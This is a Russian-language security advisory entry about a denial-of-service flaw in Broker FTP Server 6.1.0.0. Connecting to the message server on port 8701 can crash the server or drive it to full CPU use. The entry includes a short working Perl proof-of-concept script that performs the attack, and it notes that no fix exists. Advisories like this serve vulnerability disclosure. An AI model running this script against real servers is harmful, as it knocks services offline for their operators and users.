Дата публикации: | 15.02.2004 |
Всего просмотров: | 1281 |
Опасность: | Средняя |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: Broker FTP Server 6.1.0.0
Описание: Две уязвимости обнаружены в Broker FTP server. Удаленный пользователь может аварийно завершить работу FTP сервера или заставить систему использовать 100% CPU. Удаленный пользователь может подключится и затем сразу отключится от Broker FTP server Message Server (8701 порт по умолчанию), чтобы аварийно завершить работу FTP сервера. Также сообщается, что удаленный пользователь может подключится к message server и не посылая никаких данных оставить подключение открытым, чтобы заставить процесс TsFtpSrv.exe использовать 100% CPU. Пример/Эксплоит: #!/usr/bin/perl -w # TransSoft Broker FTP Server DoS (CPU usage and Exception) use Socket; if (not $ARGV[0]) { print qq~ Usage: pfdos.pl < host> ~; exit;} $ip=$ARGV[0]; print "host: " . $ip . "\n\n"; sendexplt("A"); sub sendexplt { my ($pstr)=@_; $target= inet_aton($ip) || die("inet_aton problems"); socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp') ||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,8701,$target)){ select(S); $|=1; print $pstr; sleep 100; close(S); } else { die("Can't connect...\n"); } URL производителя: http://www.ftp-broker.com/view_content.asp?ID=7 Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | Broker FTP DoS (Message Server) |